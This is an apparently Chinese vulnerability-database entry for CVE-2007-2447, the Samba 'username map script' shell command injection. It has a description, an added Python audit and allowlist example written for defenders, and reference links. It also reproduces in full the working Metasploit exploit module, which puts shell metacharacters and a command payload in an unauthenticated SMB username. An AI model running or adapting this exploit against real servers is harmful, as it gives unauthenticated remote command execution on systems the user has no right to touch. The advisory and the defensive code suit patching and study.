Samba MS-RPC Shell Command Injection Vulnerability

Vulnerability ID: 1119744 | Type: Code injection
Published: 2010-08-18 | Updated: 2015-03-19
CVE: CVE-2007-2447 | CNNVD ID: CNNVD-200705-286
Platform: Unix | CVSS score: 6.0
|Sources
https://www.exploit-db.com/exploits/16320
https://www.securityfocus.com/bid/23972
https://cxsecurity.com/issue/WLB-2007050054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-286
|Details
Samba is free software developed by the Samba Team that lets UNIX-family operating systems interoperate with Microsoft Windows over the SMB/CIFS network protocol; it supports shared printers, file transfer and similar services. Samba has an input validation vulnerability when processing user-supplied data, which a remote attacker could exploit to execute arbitrary commands on the server. The code in Samba responsible for updating user passwords in the SAM database passes user input to /bin/sh without filtering. If malicious input is submitted via MS-RPC when an external script defined in smb.conf is invoked through /bin/sh, an attacker could execute arbitrary commands with the privileges of the nobody user.
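Added defender-side example (not code from this page, from Samba, or from the Metasploit module below): it audits an smb.conf text for the non-default `username map script` option that this vulnerability depends on, and shows the allowlist check that must run before a username is handed to any mapping script, with the script invoked as an argv list rather than through /bin/sh. The smb.conf fragment and usernames are constructed, and the `/etc/samba/mapusers.sh` path is a placeholder.

```python
"""Defender-side checks for the Samba "username map script" injection class
(CVE-2007-2447). Added example, not code from Samba or the Metasploit module.

Samba 3.0.20 through 3.0.25rc3 handed the unfiltered SMB username to the
configured script through /bin/sh. Two checks a defender wants: an smb.conf
audit for the risky option, and a username allowlist applied before any
external mapping script runs, with the script started from an argv list and
never via a shell.
"""
import re

# Characters /bin/sh interprets; whitespace is treated as a separator too.
SHELL_META = set("`$|&;<>()'\"\\\n*?[]{}~!#")

# Assumption: a conservative allowlist; adjust to the site's naming rules.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def shell_meta_in(username: str) -> set:
    """Return the shell-significant characters present in a username."""
    return {c for c in username if c in SHELL_META or c.isspace()}


def is_safe_username(username: str) -> bool:
    """True only if the username matches the allowlist exactly."""
    return SAFE_USERNAME.fullmatch(username) is not None


def build_map_command_argv(script: str, username: str) -> list:
    """Hardened form of 'run the mapping script with the username'.

    The username is validated first and then placed in its own argv element,
    so subprocess.run(argv) would start the script without /bin/sh parsing it.
    """
    if not is_safe_username(username):
        raise ValueError("username rejected; shell metacharacters: %r"
                         % sorted(shell_meta_in(username)))
    return [script, username]


def audit_smb_conf(text: str) -> list:
    """Return (section, value) for every 'username map script' setting.

    Samba matches parameter names case-insensitively and ignores embedded
    whitespace, so the key is normalised the same way before comparison.
    """
    findings = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank and comment lines
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.strip().lower().replace(" ", "") == "usernamemapscript":
            findings.append((section, value.strip()))
    return findings


# Constructed smb.conf fragment; the script path is a placeholder.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   ; non-default option that made CVE-2007-2447 reachable before authentication
   Username Map Script = /etc/samba/mapusers.sh

[homes]
   browseable = no
"""

if __name__ == "__main__":
    for section, script in audit_smb_conf(SAMPLE_SMB_CONF):
        print("[%s] username map script = %s  <- remove, or upgrade Samba"
              % (section, script))
    for name in ("alice", "/=`nohup true`"):
        verdict = "safe" if is_safe_username(name) else "rejected"
        print(name, verdict, sorted(shell_meta_in(name)))
```

The audit only finds the option; the fix for affected versions is to remove it or upgrade, since the vulnerable code path runs before authentication. The allowlist plus argv-list invocation is the general pattern for any script Samba (or anything else) spawns with caller-controlled strings.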
|Exploit
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SMB

	# For our customized version of session_setup_ntlmv1
	CONST = Rex::Proto::SMB::Constants
	CRYPT = Rex::Proto::SMB::Crypt

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba "username map script" Command Execution',
			'Description'    => %q{
					This module exploits a command execution vulnerability in Samba
				versions 3.0.20 through 3.0.25rc3 when using the non-default
				"username map script" configuration option. By specifying a username
				containing shell meta characters, attackers can execute arbitrary
				commands.

				No authentication is needed to exploit this vulnerability since
				this option is used to map usernames prior to authentication!
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10040 $',
			'References'     =>
				[
					[ 'CVE', '2007-2447' ],
					[ 'OSVDB', '34700' ],
					[ 'BID', '23972' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
					[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => true, # root or nobody user
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							# *_perl and *_ruby work if they are installed
							# mileage may vary from system to system..
						}
				},
			'Targets'        =>
				[
					[ "Automatic", { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 14 2007'))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end


	def exploit

		connect

		# lol?
		username = "/=`nohup " + payload.encoded + "`"
		begin
			simple.client.negotiate(false)
			simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
		rescue ::Timeout::Error, XCEPT::LoginError
			# nothing, it either worked or it didn't ;)
		end

		handler
	end

end
|Affected products
Xerox WorkCentre Pro 275 Xerox WorkCentre Pro 265 Xerox WorkCentre Pro 255 Xerox WorkCentre Pro 245 Xerox WorkCentre Pro 238 Xerox WorkCentre Pro 232 Xer
|References

Source: VU#268336
Name: VU#268336
Link: http://www.kb.cert.org/vuls/id/268336
Source: BUGTRAQ
Name: 20070513 [SAMBA-SECURITY] CVE-2007-2447: Remote Command Injection Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/468565/100/0/threaded
Source: www.samba.org
Link: http://www.samba.org/samba/security/CVE-2007-2447.html
Source: issues.rpath.com
Link: https://issues.rpath.com/browse/RPL-1366
Source: UBUNTU
Name: USN-460-1
Link: http://www.ubuntu.com/usn/usn-460-1
Source: TRUSTIX
Name: 2007-0017
Link: http://www.trustix.org/errata/2007/0017/
Source: SECTRACK
Name: 1018051
Link: http://www.securitytracker.com/id?1018051
Source: BID
Name: 23972
Link: http://www.securityfocus.com/bid/23972
Source: BUGTRAQ
Name: 20070515 FLEA-2007-0017-1: samba
Link: http://www.securityfocus.com/archive/1/archive/1/468670/100/0/threaded
Source: REDHAT
Name: RHSA-2007:0354
Link: http://www.redhat.com/support/errata/RHSA-2007-0354.html
Source: OSVDB
Name: 34700
Link: http://www.osvdb.org/34700
Source: VUPEN
Name: ADV-2007-1805
Link: http://www.frsirt.com/english/advisories/2007/1805
Source: DEBIAN
Name: DSA-1291
Link: http://www.debi